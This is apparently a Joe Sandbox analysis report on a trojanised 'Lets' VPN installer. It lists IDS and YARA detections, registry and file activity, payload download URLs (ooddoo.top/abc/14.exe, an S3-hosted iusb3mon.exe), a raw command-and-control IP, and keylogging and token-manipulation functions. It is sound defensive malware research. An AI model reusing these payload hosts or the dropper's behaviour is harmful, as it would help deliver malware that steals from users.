C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe, ParentProcessId: 320, ParentProcessName: irsetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, ProcessId: 5620, ProcessName: powershell.exe
                              Sigma detected: Windows Processes Suspicious Parent Directory
                              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7544, ProcessName: svchost.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-29T16:09:26.781807+010020224821A Network Trojan was detected192.168.2.549717104.21.81.22480TCP
                              2024-12-29T16:09:29.499309+010020224821A Network Trojan was detected192.168.2.549720104.21.81.224443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-29T16:09:29.920224+010020219541A Network Trojan was detected104.21.81.224443192.168.2.549720TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus detection for dropped file
                              Source: C:\ProgramData\Program\iusb3mon.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen2
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen2
                              Multi AV Scanner detection for submitted file
                              Source: Lets-x64.exeReversingLabs: Detection: 13%
                              Source: Lets-x64.exeVirustotal: Detection: 13%Perma Link
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                              Machine Learning detection for dropped file
                              Source: C:\ProgramData\Program\iusb3mon.exeJoe Sandbox ML: detected
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: Lets-x64.exeJoe Sandbox ML: detected

                              Compliance

                              barindex
                              Detected unpacking (creates a PE file in dynamic memory)
                              Source: C:\ProgramData\Program\iusb3mon.exeUnpacked PE file: 28.2.iusb3mon.exe.6240000.3.unpack
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeDirectory created: C:\Program Files\product1\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeDirectory created: C:\Program Files\product1\letsvpn-latest.exeJump to behavior
                              Source: unknownHTTPS traffic detected: 104.21.81.224:443 -> 192.168.2.5:49720 version: TLS 1.2
                              Source: Lets-x64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb source: _P18sPbB.exe, 00000011.00000003.2314228018.0000000003440000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp, iusb3mon.exe, 0000001C.00000003.2353080061.0000000000C30000.00000004.00001000.00020000.00000000.sdmp
                              Source: Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb% source: _P18sPbB.exe, 00000011.00000003.2314228018.0000000003440000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp, iusb3mon.exe, 0000001C.00000003.2353080061.0000000000C30000.00000004.00001000.00020000.00000000.sdmp
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06242E2C __EH_prolog,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,28_2_06242E2C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\user\AppDataJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.5:49717 -> 104.21.81.224:80
                              Source: Network trafficSuricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.5:49720 -> 104.21.81.224:443
                              Source: Network trafficSuricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 104.21.81.224:443 -> 192.168.2.5:49720
                              Source: global trafficTCP traffic: 192.168.2.5:49741 -> 202.79.169.178:25445
                              Source: unknownTCP traffic detected without corresponding DNS query: 202.79.169.178
                              Source: unknownTCP traffic detected without corresponding DNS query: 202.79.169.178
                              Source: unknownTCP traffic detected without corresponding DNS query: 202.79.169.178
                              Source: unknownTCP traffic detected without corresponding DNS query: 202.79.169.178
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_062467CC shellex,SetThreadExecutionState,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,WinExec,WinExec,WinExec,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WSAStartup,socket,GetCurrentThreadId,htons,inet_addr,connect,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,GetModuleFileNameA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,ExitProcess,StartServiceCtrlDispatcherA,Sleep,GetModuleFileNameA,CopyFileA,Sleep,28_2_062467CC
                              Source: global trafficHTTP traffic detected: GET /abc/14.exe HTTP/1.1Accept: */*User-Agent: Setup Factory 9.0Connection: Keep-AliveCache-Control: no-cacheHost: ooddoo.top
                              Source: global trafficHTTP traffic detected: GET /abc/14.exe HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Setup Factory 9.0Host: ooddoo.topConnection: Keep-AliveCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: ooddoo.top
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txt
                              Source: iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txtMozilla/4.0
                              Source: irsetup.exe, 00000002.00000003.2065368988.0000000005D87000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.152.151/abc/
                              Source: powershell.exe, 00000015.00000002.2468286953.00000000079F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2470339301.0000000007A0D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2468286953.0000000007A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                              Source: powershell.exe, 0000002A.00000002.2682802486.0000000007B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro4O
                              Source: svchost.exe, 00000021.00000002.4023427630.000001F07F400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                              Source: svchost.exe, 00000021.00000003.2352785710.000001F07F2C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                              Source: powershell.exe, 0000000C.00000002.2206862853.000001AEADFC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2206862853.000001AEADE8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2188375512.000001AE9F6EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2413825502.0000000005CEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2459393253.00000000061CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2443179849.000000000647A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2440447207.000000000579A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2668466400.00000000060EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2668309945.000000000565C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2659259430.00000000065E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: Lets-x64.exe, 00000000.00000002.2187444306.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                              Source: irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/
                              Source: irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/14.exe
                              Source: irsetup.exe, 00000002.00000002.4576101821.000000000615F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/14.exe;e
                              Source: irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/14.exeN
                              Source: irsetup.exe, 00000002.00000002.4576101821.000000000615F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/14.exeXd
                              Source: irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/14.exel1~
                              Source: irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/14.exel=~
                              Source: powershell.exe, 0000002A.00000002.2522220114.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: powershell.exe, 0000000C.00000002.2188375512.000001AE9DE11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2357715905.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2377801523.0000000005161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2380767167.0000000005411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2370202474.0000000004731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2513816105.000000000508E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2516061641.00000000045F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 0000000C.00000002.2188375512.000001AE9F2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                              Source: powershell.exe, 0000002A.00000002.2522220114.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: Lets-x64.exe, 00000000.00000002.2187444306.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.indigorose.com
                              Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4577432527.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2063081157.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.indigorose.com/route.php?pid=suf9buy
                              Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4577432527.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2063081157.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.indigorose.com/route.php?pid=suf9buyd
                              Source: powershell.exe, 0000000C.00000002.2187796754.000001AE9C21E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                              Source: irsetup.exe, 00000002.00000003.2065368988.0000000005D87000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yourcompany.com
                              Source: powershell.exe, 0000000C.00000002.2188375512.000001AE9DE11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                              Source: powershell.exe, 00000012.00000002.2357715905.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2377801523.0000000005161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2380767167.0000000005411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2370202474.0000000004731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2513816105.000000000508E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2516061641.00000000045F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
                              Source: powershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: svchost.exe, 00000021.00000003.2352785710.000001F07F333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                              Source: svchost.exe, 00000021.00000003.2352785710.000001F07F2C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                              Source: powershell.exe, 0000002A.00000002.2522220114.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: powershell.exe, 0000000C.00000002.2206862853.000001AEADFC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2206862853.000001AEADE8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2188375512.000001AE9F6EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2413825502.0000000005CEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2459393253.00000000061CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2443179849.000000000647A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2440447207.000000000579A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2668466400.00000000060EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2668309945.000000000565C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: powershell.exe, 0000000C.00000002.2188375512.000001AE9F2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                              Source: powershell.exe, 0000000C.00000002.2188375512.000001AE9F2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                              Source: irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooddoo.top/
                              Source: irsetup.exe, 00000002.00000002.4576101821.000000000615F000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooddoo.top/abc/14.exe
                              Source: irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooddoo.top/abc/14.exeI
                              Source: irsetup.exe, 00000002.00000002.4576101821.000000000615F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooddoo.top/abc/14.exeMe
                              Source: irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooddoo.top/h
                              Source: irsetup.exe, 00000002.00000003.2065368988.0000000005D87000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xiaoma.s3.ap-east-1.amazonaws.com/iusb3mon.exe
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                              Source: unknownHTTPS traffic detected: 104.21.81.224:443 -> 192.168.2.5:49720 version: TLS 1.2

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              barindex
                              Contains functionality to capture and log keystrokes
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: <BackSpace>28_2_06242BF0
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: <Enter>28_2_06242BF0
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06242BF0 CreateMutexA,WaitForSingleObject,Sleep,lstrlenA,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrlenA,lstrcatA,lstrcatA,28_2_06242BF0
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0625ABEF GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,28_2_0625ABEF
                              Source: powershell.exeProcess created: 80
                              Source: conhost.exeProcess created: 64
                              Source: cmd.exeProcess created: 43

                              System Summary

                              barindex
                              Malicious sample detected (through community Yara rule)
                              Source: Process Memory Space: powershell.exe PID: 5996, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                              Source: Process Memory Space: powershell.exe PID: 7960, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                              PE file contains section with special chars
                              Source: _P18sPbB.exe.2.drStatic PE information: section name:
                              Source: _P18sPbB.exe.2.drStatic PE information: section name:
                              Source: _P18sPbB.exe.2.drStatic PE information: section name:
                              Source: _P18sPbB.exe.2.drStatic PE information: section name:
                              Source: _P18sPbB.exe.2.drStatic PE information: section name:
                              Source: iusb3mon.exe.17.drStatic PE information: section name:
                              Source: iusb3mon.exe.17.drStatic PE information: section name:
                              Source: iusb3mon.exe.17.drStatic PE information: section name:
                              Source: iusb3mon.exe.17.drStatic PE information: section name:
                              Source: iusb3mon.exe.17.drStatic PE information: section name:
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess Stats: CPU usage > 49%
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06245792 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,LoadLibraryA,GetProcAddress,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,28_2_06245792
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0624628E WinExec,WinExec,WinExec,WinExec,Sleep,ExitWindowsEx,28_2_0624628E
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_062439EC ExitWindowsEx,28_2_062439EC
                              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF668851C880_2_00007FF668851C88
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF668853D400_2_00007FF668853D40
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800268002_2_0000000180026800
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800300142_2_0000000180030014
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800278542_2_0000000180027854
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018003C0A02_2_000000018003C0A0
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800218A42_2_00000001800218A4
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800228CC2_2_00000001800228CC
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800308FC2_2_00000001800308FC
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800310FC2_2_00000001800310FC
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800339142_2_0000000180033914
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018002B9382_2_000000018002B938
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018002F1542_2_000000018002F154
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800332202_2_0000000180033220
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180024A602_2_0000000180024A60
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800272682_2_0000000180027268
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018003029C2_2_000000018003029C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018002A29C2_2_000000018002A29C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180023AF02_2_0000000180023AF0
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800352F82_2_00000001800352F8
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800313282_2_0000000180031328
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018001F34C2_2_000000018001F34C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018003E3542_2_000000018003E354
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180021B882_2_0000000180021B88
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800223CC2_2_00000001800223CC
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180026BD42_2_0000000180026BD4
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_0000000180022BE82_2_0000000180022BE8
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018001EBFC2_2_000000018001EBFC
